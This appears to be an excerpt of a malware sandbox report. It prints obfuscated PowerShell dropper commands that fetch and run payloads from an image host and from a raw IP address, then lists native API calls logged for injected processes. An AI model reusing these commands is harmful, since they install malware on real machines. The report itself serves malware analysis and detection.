                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0042CCE3 NtClose,12_2_0042CCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040AB7F NtResumeThread,12_2_0040AB7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C35C0 NtCreateMutant,LdrInitializeThunk,12_2_017C35C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2B60 NtClose,LdrInitializeThunk,12_2_017C2B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_017C2DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_017C2C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3010 NtOpenDirectoryObject,12_2_017C3010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3090 NtSetValueKey,12_2_017C3090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C4340 NtSetContextThread,12_2_017C4340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C4650 NtSuspendThread,12_2_017C4650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C39B0 NtGetContextThread,12_2_017C39B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2BF0 NtAllocateVirtualMemory,12_2_017C2BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2BE0 NtQueryValueKey,12_2_017C2BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2BA0 NtEnumerateValueKey,12_2_017C2BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2B80 NtQueryInformationFile,12_2_017C2B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2AF0 NtWriteFile,12_2_017C2AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2AD0 NtReadFile,12_2_017C2AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2AB0 NtWaitForSingleObject,12_2_017C2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3D70 NtOpenThread,12_2_017C3D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2D30 NtUnmapViewOfSection,12_2_017C2D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2D10 NtMapViewOfSection,12_2_017C2D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3D10 NtOpenProcessToken,12_2_017C3D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2D00 NtSetInformationFile,12_2_017C2D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2DD0 NtDelayExecution,12_2_017C2DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2DB0 NtEnumerateKey,12_2_017C2DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2C60 NtCreateKey,12_2_017C2C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2C00 NtQueryInformationProcess,12_2_017C2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2CF0 NtOpenProcess,12_2_017C2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2CC0 NtQueryVirtualMemory,12_2_017C2CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2CA0 NtQueryInformationToken,12_2_017C2CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2F60 NtCreateProcessEx,12_2_017C2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2F30 NtCreateSection,12_2_017C2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2FE0 NtCreateFile,12_2_017C2FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2FB0 NtResumeThread,12_2_017C2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2FA0 NtQuerySection,12_2_017C2FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2F90 NtProtectVirtualMemory,12_2_017C2F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2E30 NtWriteVirtualMemory,12_2_017C2E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2EE0 NtQueueApcThread,12_2_017C2EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2EA0 NtAdjustPrivilegesToken,12_2_017C2EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2E80 NtReadVirtualMemory,12_2_017C2E80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E835C0 NtCreateMutant,LdrInitializeThunk,16_2_04E835C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E84650 NtSuspendThread,LdrInitializeThunk,16_2_04E84650
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E84340 NtSetContextThread,LdrInitializeThunk,16_2_04E84340
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_04E82CA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82C60 NtCreateKey,LdrInitializeThunk,16_2_04E82C60
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_04E82C70
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_04E82DF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82DD0 NtDelayExecution,LdrInitializeThunk,16_2_04E82DD0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82D30 NtUnmapViewOfSection,LdrInitializeThunk,16_2_04E82D30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82D10 NtMapViewOfSection,LdrInitializeThunk,16_2_04E82D10
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82EE0 NtQueueApcThread,LdrInitializeThunk,16_2_04E82EE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82E80 NtReadVirtualMemory,LdrInitializeThunk,16_2_04E82E80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82FE0 NtCreateFile,LdrInitializeThunk,16_2_04E82FE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82FB0 NtResumeThread,LdrInitializeThunk,16_2_04E82FB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82F30 NtCreateSection,LdrInitializeThunk,16_2_04E82F30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E839B0 NtGetContextThread,LdrInitializeThunk,16_2_04E839B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82AF0 NtWriteFile,LdrInitializeThunk,16_2_04E82AF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82AD0 NtReadFile,LdrInitializeThunk,16_2_04E82AD0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82BE0 NtQueryValueKey,LdrInitializeThunk,16_2_04E82BE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_04E82BF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82BA0 NtEnumerateValueKey,LdrInitializeThunk,16_2_04E82BA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82B60 NtClose,LdrInitializeThunk,16_2_04E82B60
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83090 NtSetValueKey,16_2_04E83090
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83010 NtOpenDirectoryObject,16_2_04E83010
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82CF0 NtOpenProcess,16_2_04E82CF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82CC0 NtQueryVirtualMemory,16_2_04E82CC0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82C00 NtQueryInformationProcess,16_2_04E82C00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82DB0 NtEnumerateKey,16_2_04E82DB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83D70 NtOpenThread,16_2_04E83D70
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82D00 NtSetInformationFile,16_2_04E82D00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83D10 NtOpenProcessToken,16_2_04E83D10
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82EA0 NtAdjustPrivilegesToken,16_2_04E82EA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82E30 NtWriteVirtualMemory,16_2_04E82E30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82FA0 NtQuerySection,16_2_04E82FA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82F90 NtProtectVirtualMemory,16_2_04E82F90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82F60 NtCreateProcessEx,16_2_04E82F60
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82AB0 NtWaitForSingleObject,16_2_04E82AB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82B80 NtQueryInformationFile,16_2_04E82B80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC9660 NtCreateFile,16_2_02EC9660
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC97D0 NtReadFile,16_2_02EC97D0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC9AC0 NtAllocateVirtualMemory,16_2_02EC9AC0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC98C0 NtDeleteFile,16_2_02EC98C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC9960 NtClose,16_2_02EC9960
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_032F20853_2_032F2085
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_032F1D283_2_032F1D28
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_035B80A88_2_035B80A8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_035B87B08_2_035B87B0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_035B20BD8_2_035B20BD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00418C2312_2_00418C23
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040312012_2_00403120
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004011A012_2_004011A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401AC012_2_00401AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401AB912_2_00401AB9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0042F32312_2_0042F323
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040249012_2_00402490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004104A312_2_004104A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00416E1E12_2_00416E1E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00416E2312_2_00416E23
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004106C312_2_004106C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040E6A312_2_0040E6A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040E7E912_2_0040E7E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040E7F312_2_0040E7F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177F17212_2_0177F172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C516C12_2_017C516C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018501AA12_2_018501AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018481CC12_2_018481CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178010012_2_01780100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182A11812_2_0182A118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179B1B012_2_0179B1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0185B16B12_2_0185B16B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183F0CC12_2_0183F0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184F0E012_2_0184F0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018470E912_2_018470E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017970C012_2_017970C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D34C12_2_0177D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018503E612_2_018503E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F012_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184132D12_2_0184132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184A35212_2_0184A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017D739A12_2_017D739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C012_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017952A012_2_017952A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183027412_2_01830274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0185059112_2_01850591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182D5B012_2_0182D5B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179053512_2_01790535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184757112_2_01847571
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178146012_2_01781460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183E4F612_2_0183E4F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184F43F12_2_0184F43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184244612_2_01842446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179077012_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B475012_2_017B4750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184F7B012_2_0184F7B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178C7C012_2_0178C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018416CC12_2_018416CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AC6E012_2_017AC6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A696212_2_017A6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0185A9A612_2_0185A9A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179995012_2_01799950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB95012_2_017AB950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017929A012_2_017929A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179284012_2_01792840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179A84012_2_0179A840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BE8F012_2_017BE8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017938E012_2_017938E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017768B812_2_017768B8
